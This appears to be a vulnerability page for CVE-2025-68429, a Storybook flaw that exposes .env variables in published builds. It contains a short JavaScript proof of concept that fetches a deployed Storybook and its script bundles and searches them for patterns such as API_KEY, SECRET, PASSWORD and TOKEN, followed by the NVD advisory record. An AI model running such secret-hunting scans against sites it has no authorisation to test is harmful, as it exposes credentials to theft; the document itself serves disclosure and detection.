CVE-2025-68429

// CVE-2025-68429 PoC - 环境变量泄露检测 // 1. 访问部署的Storybook页面 const targetUrl = 'https://vulnerable-storybook.example.com'; // 2. 获取页面源代码，搜索敏感环境变量模式 async function checkEnvLeak(url) { const response = await fetch(url); const html = await response.text(); // 常见的敏感变量名模式 const sensitivePatterns = [ /API_KEY/i, /SECRET/i, /PASSWORD/i, /TOKEN/i, /DATABASE/i, /CREDENTIAL/i ]; // 检查HTML中是否包含暴露的敏感信息 const leaks = sensitivePatterns .filter(pattern => pattern.test(html)) .map(pattern => pattern.source); return { vulnerable: leaks.length > 0, exposedVariables: leaks }; } // 3. 检查JavaScript bundle中的环境变量 async function checkBundle(url) { // 查找main.xxx.js文件 const jsFiles = document.querySelectorAll('script[src]'); for (const file of jsFiles) { const response = await fetch(file.src); const jsContent = await response.text(); // 搜索环境变量定义模式 const envPatterns = [ /process\.env\.[A-Z_]+/g, /\.env\.[A-Z_]+/g ]; for (const pattern of envPatterns) { const matches = jsContent.match(pattern); if (matches) { console.log('Potential env leak:', matches); } } } }

{"cve": {"id": "CVE-2025-68429", "sourceIdentifier": "[email protected]", "published": "2025-12-17T23:16:05.140", "lastModified": "2026-04-10T17:22:25.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Storybook is a frontend workshop for building user interface components and pages in isolation. A vulnerability present starting in versions 7.0.0 and prior to versions 7.6.21, 8.6.15, 9.1.17, and 10.1.10 relates to Storybook’s handling of environment variables defined in a `.env` file, which could, in specific circumstances, lead to those variables being unexpectedly bundled into the artifacts created by the `storybook build` command. When a built Storybook is published to the web, the bundle’s source is viewable, thus potentially exposing those variables to anyone with access. For a project to potentially be vulnerable to this issue, it must build the Storybook (i.e. run `storybook build` directly or indirectly) in a directory that contains a `.env` file (including variants like `.env.local`) and publish the built Storybook to the web. Storybooks built without a `.env` file at build time are not affected, including common CI-based builds where secrets are provided via platform environment variables rather than `.env` files. Storybook runtime environments (i.e. `storybook dev`) are not affected. Deployed applications that share a repo with your Storybook are not affected. Users should upgrade their Storybook—on both their local machines and CI environment—to version .6.21, 8.6.15, 9.1.17, or 10.1.10 as soon as possible. Maintainers additionally recommend that users audit for any sensitive secrets provided via `.env` files and rotate those keys. Some projects may have been relying on the undocumented behavior at the heart of this issue and will need to change how they reference environment variables after this update. If a project can no longer read necessary environmental variable values, either prefix the variables with `STORYBOOK_` or use the `env` property in Storybook’s configuration to manually specify values. In either case, do not include sensitive secrets as they will be included in the built bundle."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-538"}, {"lang": "en", "value": "CWE-541"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:storybook:storybook:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.6.21", "matchCriteriaId": "5C3CF775-3596-406E-AAAB-B20DFCF70968"}, {"vulnerable": true, "criteria": "cpe:2.3:a:storybook:storybook:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.6.15", "matchCriteriaId": "48B589F7-CB59-4ECC-A112-E3DFF42736F6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:storybook:storybook:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.1.17", "matchCriteriaId": "103EF391-CCA5-4A2F-B251-E88C82750702"}, {"vulnerable": true, "criteria": "cpe:2.3:a:storybook:storybook:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.1.10", "matchCriteriaId": "97591A94-A9AE-419A-AEAA-85882302BB16"}]}]}], "references": [{"url": "https://github.com/storybookjs/storybook/security/advisories/GHSA-8452-54wp-rmv6", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://storybook.js.org/blog/security-advisory", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}